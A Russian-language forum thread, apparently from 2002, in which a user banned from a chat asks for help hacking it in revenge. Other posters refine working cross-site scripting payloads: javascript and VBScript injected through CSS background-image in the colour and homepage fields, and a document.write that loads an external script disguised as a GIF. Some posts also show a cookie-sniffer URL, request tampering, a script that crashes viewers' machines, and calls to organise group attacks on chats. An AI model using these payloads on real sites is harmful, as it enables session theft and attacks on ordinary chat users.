|
Мужики меня несправедливо и очень сильно обидили выкинули из чата и к тому же через дыру в IE админ сбросил вирус - www.farit.ru Помогите.
Теперь подробнее. Сижу в привате никому не мешаю. Вдруг меня админ выкидывает, на экране появляется "Вы выкинуты из чата". И тут мой AVP как начал кричать про вирусы... Оказывается в это окошко какие только вирусы-скрипты они не подобоваляли. Что обидно - совершенно без всяких объяснений (и вел себя я очень порядочно). Потом узнал - там админы сами ведут себя ооочень непорядочно. Выкидывают всех подряд, сами матом орут и что вообще УЖАС вирусы всем кидают. Особенно обидно это тем, что туда приходят местные (уфимские) для знакомства а в Уфе больше такого популярного сайта больше нету. Да мне и девченки там много понарасказали, как троянов им все время админы кидают и пр. Одним словом БЕСПРЕДЕЛ и БЕЗОБРАЗИЕ. Помогите. Должна восторжестовать справедливость. Pls |
Забыл сказать - мне нужен лишь совет КАК... хотя как можно подробнее
|
Дык что "КАК" ??
|
Подскажи опытным взглядом дыры...или же чат вообще "невзламываемый"?
|
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (subscribe1 @ июня 03 2002,12:43)</td></tr><tr><td id="QUOTE">Подскажи опытным взглядом дыры...или же чат вообще "невзламываемый"?[/QUOTE]<span id='postcolor'>
Еще и как взламываемый...как минимум две дыры вижу .... Одна - в URL картинки фона, другая - в URL домашней странички ... А мож и еще есть ... |
Спасибо ... буду стараться разобраться в меру своего знания и образования. Если увидите еще дыры - был бы очень признателен. http://forum.antichat.ru/iB_html/non...cons/smile.gif
|
Насчет первого замечания (картинка фона). Как же я могу ей воспользоваться если ОНА ВИДНА ЛИШЬ ДЛЯ ТОГО КТО ПОСЫЛАЕТ сообщение. Любой ее взлом - может испортить лишь ту частьб HTML кода который генерируется ТОЛЬКО для меня (т.е. картинка фона не для всех). В чем же здесь дыра, увжажаемый Algol?
Дима |
Я считаю, что админ тебе вирусы не совал... Выкини АВП на помойку...
Я всю сознательную жизнь на Dr.Web-е, недавно решил попробовать АВП... Хыыы... на диске, абсолютно чистом, со взгляда Web-а, авп нашел свыше сотни вирусов... Потому, что он обнаружил кучу, на его взгляв вредных скриптов *.js ! Это были всякие миленькие открывалки окон(Здесь пример!) и т.п... Видимо админ попытался тебе сделать что-то подобное, вот твой авп и заверещал... http://forum.antichat.ru/iB_html/non...icons/wink.gif |
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Dj Skeleton™ @ июня 04 2002,13:49)</td></tr><tr><td id="QUOTE">Я считаю, что админ тебе вирусы не совал... Выкини АВП на помойку...
Я всю сознательную жизнь на Dr.Web-е, недавно решил попробовать АВП... Хыыы... на диске, абсолютно чистом, со взгляда Web-а, авп нашел свыше сотни вирусов... Потому, что он обнаружил кучу, на его взгляв вредных скриптов *.js ! Это были всякие миленькие открывалки окон(Здесь пример!) и т.п... Видимо админ попытался тебе сделать что-то подобное, вот твой авп и заверещал... ;)[/QUOTE]<span id='postcolor'> Поясняю - совал именно Админ. Это 100%. Потому и говорю что обидели очень сильно. Когда выкидывают из чата - появляется сообщение "вы выкинуты из чата". И все. Но здесь в это сообщение были подцеплены скриптовирусы. И теперь когда пытаешься зайти на сайт под своим IP появляется это сообщение и в ту же секунду с машиной такое начинает твориться... Мой знакомый специально узнавал, админы в этом чате ПРОСТО прикалываются (известны много случаев когда они шпионили за девушками и пр.) Одим словом - мое лично мнение - все ЭТО ОЧЕНЬ НЕПОРЯДОЧНО и граничит со статьей 28 УК РФ. Потому и прошу помощи... |
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (subscribe1 @ июня 04 2002,12:52)</td></tr><tr><td id="QUOTE">Насчет первого замечания (картинка фона). Как же я могу ей воспользоваться если ОНА ВИДНА ЛИШЬ ДЛЯ ТОГО КТО ПОСЫЛАЕТ сообщение. Любой ее взлом - может испортить лишь ту частьб HTML кода который генерируется ТОЛЬКО для меня (т.е. картинка фона не для всех). В чем же здесь дыра, увжажаемый Algol?
Дима[/QUOTE]<span id='postcolor'> Ааа.. сорри, не знал что бекграунд только у себя можно менять .... Но зато точно работает дыра в URL странички, и кроме того чат взламывается через цвет. Например такой: ;background-image:url(VBScript:alert()) По непонятной причине скрипты на JavaScript не срабатывают, но зато VBScript катит на полную катушку... |
1) Насчет VB -спасибо. Буду работать... http://forum.antichat.ru/iB_html/non...cons/smile.gif
2) "Но зато точно работает дыра в URL странички", не подскажешь что это такое (или ссылка на статью). Спасибо |
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (subscribe1 @ июня 04 2002,17:11)</td></tr><tr><td id="QUOTE">1) Насчет VB -спасибо. Буду работать... :)
2) "Но зато точно работает дыра в URL странички", не подскажешь что это такое (или ссылка на статью). Спасибо[/QUOTE]<span id='postcolor'> В информации пользователя можно указывать адрес домашней странички. Вместо него пишешь например " style=`background-image:url('javascript:alert()');visibility:hidden` Этот скрипт сработает у всякого, кто посмотрит твою инфу... |
Восторженные аплодисменты, Algolу от меня! Восхищен. И еще раз заверяю всех, что будут наказаны только обидчики. Это мой принцип.
Дима http://forum.antichat.ru/iB_html/non...cons/smile.gif Спасибо |
Намсет JavaScript - самое смешное что у меня работает. И довольно хорошо.
Теперь буду разбираться как можно выкинуть обидчиков из чата... |
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">" style=`background-image:url('javascript:alert()'http://forum.antichat.ru/iB_html/non...icons/wink.gif;visibility:hidden`[/QUOTE]<span id='postcolor'>
<span id='ME'><center>mifan думает что нада писать в конце не <span style='color:red'>'</span> а <span style='color:red'>"</span></center></span> |
и так подведем итоги:
Если в информации пользователя вместо урл странички указать </span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Исходный код </td></tr><tr><td id="CODE"> " style=`background-image:url('javascript:alert()');visibility:hidden" [/QUOTE]<span id='postcolor'> То этот скрипт сработает у всякого кто просмотрит вашу инфу. ======================================= Так что еще, может кто нибуть нашел еще уязвимостиhttp://forum.antichat.ru/iB_html/non...s/confused.gif? |
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">mifan думает что нада писать в конце не <span style='color:red;backgrоund-image:иrl("//antichat.ru/cgi-bin/sniff.pl")'>"</span> а <span style='color:red;backgrоund-image:иrl(mailto:вот как бывает ...)'>"</span>[/QUOTE]<span id='postcolor'>
Algol думает что в конце нужно писать именно ` "все прошло"... Егорыч+++ Ага , как бы не так )) .... Algol My Webpage |
Предыдущее общение можно стереть (я дурак)...
Вопросик, хочу написать скарипт посложнее... Вот такой вот работает (через цвет): цвет="background-image:url(javascript:document.write(unescape('%3C' )+'script'+unescape('%3E')+'alert()'+';'+'alert()' +unescape('%3C')+'/script'+unescape('%3E') ))"" В чате он превращается в color:;background-image:url(javascript:document.write(unescape(& #39;%3C&#39;)+&#39;script&#39;+unescap e(&#39;%3E&#39;)+&#39;alert()&#39; +&#39;;&#39;+&#39;alert()&#39;+une scape(&#39;%3C&#39;)+&#39;/script&#39;+unescape(&#39;%3E&#39;) )); Но все равно работает. Но вот когда я забиваю внутрь alert что нибудь типа alert ('kkk') то он преврfщается в неисполнимый (т.е. ' чат внутри алерта меняет на &#39) и скрипт не испольняется. Как быть не подскажите? |
Уже решил... можете не отвечать: alert(&quot;dd&quot;)
|
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Algol @ июня 05 2002,12:11)</td></tr><tr><td id="QUOTE"></span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">mifan думает что нада писать в конце не <span style='color:red;backgrоund-image:иrl("//antichat.ru/cgi-bin/sniff.pl")'>"</span> а <span style='color:red;backgrоund-image:иrl(mailto:вот как бывает ...)'>"</span>[/QUOTE]<span id='postcolor'>
Algol думает что в конце нужно писать именно ` "все прошло"... Егорыч+++ Ага , как бы не так )) .... Algol[/QUOTE]<span id='postcolor'> странно а пачиму у меня не пашет с ', а только с ", может руки кривыеhttp://forum.antichat.ru/iB_html/non...s/confused.gif? |
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ июня 05 2002,17:16)</td></tr><tr><td id="QUOTE">Предыдущее общение можно стереть (я дурак)...
Вопросик, хочу написать скарипт посложнее... Вот такой вот работает (через цвет): цвет="background-image:url(javascript:document.write(unescape('%3C' )+'script'+unescape('%3E')+'alert()'+';'+'alert()' +unescape('%3C')+'/script'+unescape('%3E') ))"" В чате он превращается в color:;background-image:url(javascript:document.write(unescape(& #39;%3C&#39;)+&#39;script&#39;+unescap e(&#39;%3E&#39;)+&#39;alert()&#39; +&#39;;&#39;+&#39;alert()&#39;+une scape(&#39;%3C&#39;)+&#39;/script&#39;+unescape(&#39;%3E&#39;) )); Но все равно работает. Но вот когда я забиваю внутрь alert что нибудь типа alert ('kkk') то он преврfщается в неисполнимый (т.е. ' чат внутри алерта меняет на &#39) и скрипт не испольняется. Как быть не подскажите?[/QUOTE]<span id='postcolor'> можетЪ я тупой, но как этот вонючий чат можно взломать через цвет если максимум можно вписать только 30 символов?????????????? |
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (mifan @ июня 06 2002,02:54)</td></tr><tr><td id="QUOTE">странно а пачиму у меня не пашет с ', а только с ", может руки кривыеhttp://forum.antichat.ru/iB_html/non...s/confused.gif?[/QUOTE]<span id='postcolor'>
Нужно писать не ' а ` |
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (mifan @ июня 06 2002,02:59)</td></tr><tr><td id="QUOTE">можетЪ я тупой, но как этот вонючий чат можно взломать через цвет если максимум можно вписать только 30 символов??????????????[/QUOTE]<span id='postcolor'>
По моему там пропускается больше символов. Но в принципе, если поле обрезает длинну скрипта, то все равно можно вставить скрипт неограниченной длинны. Например вставив такой скрипт: document.write('< script src="http://myServer/a.js"></script>') А в файл a.js можно засунуть скрипт любой длинны. Тут еще могу сказать следующее: если тег требует закрывающего, например < script></script>, то такую запись можно сократить до такого вида < script/>. Эти два вида записи эквивалентны, но вторая существенно короче. Таким образов первый пример можно еще сократить до такого: document.write('< script src="http://myServer/a.js"/>') |
Насчет .js я только хотел написать... а ты меня опередил. До этого я и сам додумался! Гы-гы-гы. Сейчас разрабатываю соотв код. Вот только одна загвоздка - как бы вместо фоток (в профиле пользователя). Точнее в тот же каталог сунуть *.js . Может это просто? Это желательно что бы не подгружать *.js из другого сайта (что бы не было подозрительно). Вот было бы здорово! К сожаление js вместо jpg подсунуть не получается - скрипты закачки сами размер меняют... и портят. Зато #60;script src="http://www.xnjnj.ru/kill.js"> можно поменять на
#60;script src="http://www.xnjnj.ru/smile.gif"> (и переименовать соотв js на сайте-базе). Работать будет (это я для пущей анаонимности). Algol, а как ты сохранил фрейм? Я так и не понял. Использую Proxomitron (firewall оригинальный), который "на лету" меняет html-ки. Вот так вот обошел необходимость менять вид фрейма (для подстановки цветов). |
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ июня 06 2002,13:57)</td></tr><tr><td id="QUOTE">Algol, а как ты сохранил фрейм?[/QUOTE]<span id='postcolor'>
Еще раз говорю: я не сохраняю фреймы, я подделываю HTTP запросы |
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата </td></tr><tr><td id="QUOTE">Нужно писать не ' а ` [/QUOTE]<span id='postcolor'>
я делал через копипейст, ошибиться не мог |
"Я подделываю http-запросы". Понял..
Оказывается Proxomitron похоже умеет тоже самое делать... попробую. В принципе тут видимо нужно перехватывать метод POST и все... |
Единственное что не понял, почему джаваскрипт в поле бэкграунда будучи посланным в чат срабатывает только один раз (т.е. если посылаю второй раз - не срабатывает).??
|
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ июня 06 2002,19:22)</td></tr><tr><td id="QUOTE">Единственное что не понял, почему джаваскрипт в поле бэкграунда будучи посланным в чат срабатывает только один раз (т.е. если посылаю второй раз - не срабатывает).??[/QUOTE]<span id='postcolor'>
Быть такого не может ... Возможно там просто стоит защита от флуда, поэтому текст сообщения нужно менять постоянно ... |
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Algol @ июня 07 2002,11:30)</td></tr><tr><td id="QUOTE"></span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (Guest @ июня 06 2002,19:22)</td></tr><tr><td id="QUOTE">Единственное что не понял, почему джаваскрипт в поле бэкграунда будучи посланным в чат срабатывает только один раз (т.е. если посылаю второй раз - не срабатывает).??[/QUOTE]<span id='postcolor'>
Быть такого не может ... Возможно там просто стоит защита от флуда, поэтому текст сообщения нужно менять постоянно ...[/QUOTE]<span id='postcolor'> Дело такое - проксиметрон "на лету" меняет нижний фрейм (для одного из цветов делает подстановку в виде javascript). Потом в чат я посылаю сообщение - скрипт выполняется, а вот когда посылаю вотрой раз (текст сообщения другой но color;javascript.... такой же). Он уже не выпоняется.! |
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (subscribe1 @ июня 07 2002,17:24)</td></tr><tr><td id="QUOTE">Дело такое - проксиметрон "на лету" меняет нижний фрейм (для одного из цветов делает подстановку в виде javascript). Потом в чат я посылаю сообщение - скрипт выполняется, а вот когда посылаю вотрой раз (текст сообщения другой но color;javascript.... такой же). Он уже не выпоняется.![/QUOTE]<span id='postcolor'>
Дык после посылки сообщения, сервер присылает тебе форму заново, и там уже нет javascript |
Посидел почитал - довольно интересно Хотелось бы возназить автору этой темы Если все именно так как ты говоришь , то тебя не выкидували скорее всего выкинули IP сетку с которой ты сидел поэтому пострадал и ты и еще Адмиы там вполне нормальные люди, низакем они не подсматривают и личных интресов не преследуют. Если и говорят пра нихз плохое то это здые языки большенств чатлан относятся к админам с уважением!! Так что зря вы батенька бочку катите !!!! в себе разберитесь
|
Эй братан, тебя тоже швыранули? http://forum.antichat.ru/iB_html/non...cons/smile.gif
Ха-ХА- да мы по одну сторону барекад! Вобщем вот что у меня срабатывало! Пишем при регистрации, в инфе пользователя! #60;script language="JavaScript1.2">window.locat ion="file:///c:/nul/nul";</script> Затем приглашаем Посмотреть НАнАС, мотивирую это самыми защренными предлогами http://forum.antichat.ru/iB_html/non...cons/smile.gif, как только ламер 9* пошел на нас глядеть, маши ему ручкой! http://forum.antichat.ru/iB_html/non...cons/smile.gif С уважением НАЕМНИК PS Зачем чат ломать, надо узел УБИТЬ! Как говорится пусть АДМИН САМ ОБОСРАННУЮ МАЛИНУ ЕСТ! Если собиретесь мстить, я с вами пишите ! |
решил тоже написать!
не сочтите меня шестёркой, но если соберётесь напасть на какой-то чат совместно - позовите меня http://forum.antichat.ru/iB_html/non...cons/smile.gif и вообще, пора устраивать еженедельное собрание, где будет вестить обсуждение того, "на какой чат нападать сегодня" http://forum.antichat.ru/iB_html/non...ns/biggrin.gif понимаете куда я клоню? если чел, пишет сюда прося помощи, значит его вынудили... а большинство админов на чатах, это люди, кторые получив в свои гадкие лапки маленькую власть, постепенно начинают наглеть, и показывают почти любому юзеру - кто здесь хозяин. конечно можно сказать - не нравится, ходи на др. чат. но на это нужно ответить - на диких просторах инета, побеждает тот, кто сильнее http://forum.antichat.ru/iB_html/non...cons/smile.gif собакам - собачья смерть http://forum.antichat.ru/iB_html/non...ticons/mad.gif |
Бухой Дамбер-ТЫ дело говоришь! http://forum.antichat.ru/iB_html/non...cons/smile.gif "ТЯЖЕЛО В УЧЕНИИ ЛЕГКО В БОЮ!"
Ставлю этой теме в форуме 90 балов по 100 баловой шкале! А на счет того что кото там пиз-дит, типа просто подсетку выкинули, это вы уроды комунибудь другому на уши повесте! На кой )(УЙ вам понадобилось под сеть вырезать? Я так понял это один из админов с www.farit.ru был, так вот что я тебе скажу админ: Когда я свой первыйскрипт написал, ты еще мутной каплей между ног болтался! СЫНОК! Ты подписал свой узел! ..!НаемНИК!.. |
вот это да... хм... серьёзные дела...
я вот... это... про нетмаску... ведь тот админ(если это админ) может и прав http://forum.antichat.ru/iB_html/non...cons/smile.gif в чате, где я иногда сижу(и во многих др.)... ммм... если банят чела, то банят маску, т.е. с определённого прова зайти не удастся. только не могу скзать, какой всё таки диапазон (насколько он широк). поэтому нужно менять ip, напр. используя прокси(конечно анонимный, а какой смысл здесь писать про обычный?). НО, бан маски, не означает выкидывание кого-то с чата. так? просто нельзя будет войти в чат, с определённого диапазона ip. я прав? а пока чела не кикнули - он может цатицца! http://forum.antichat.ru/iB_html/non...cons/smile.gif или я не прав? а вот про скрипты... вирусы... я не могу что-либо сказать. думаю, что админы это могут творить в наказание(им, видно показалось, что бана не достаточно) конечно, не стоит исключать вероятность того, что просто какой-то чувак, решил порикаловаться... и смог атаковать скриптами. но есть подозрение, что такое мог провернуть только чувак, имеющий реальные права на данном чате(читай админ). кстати, я так и не понял, что с автором данной темы произошло, когда на него спусти скрипты(иль чаво тама ещё)? |
gghhjunkiMy Webpage
|
&#33
|
Кстати насчет того чтобы всем вместе нападать на чат, это мысль!
З.Ы. а вы случайно не знаете адресочки чатов с разрешенными хтмл-тэгами?! |
</span><table border="0" align="center" width="95%" cellpadding="3" cellspacing="1"><tr><td>Цитата (ДjavaЛИЦА @ марта 07 2003,01:48)</td></tr><tr><td id="QUOTE">З.Ы. а вы случайно не знаете адресочки чатов с разрешенными хтмл-тэгами?![/QUOTE]<span id='postcolor'>
www.gamecenter.krovatka.ru, но ето было давно и неправда, я тогда ещё хтмл не знал.... |
| Время: 05:17 |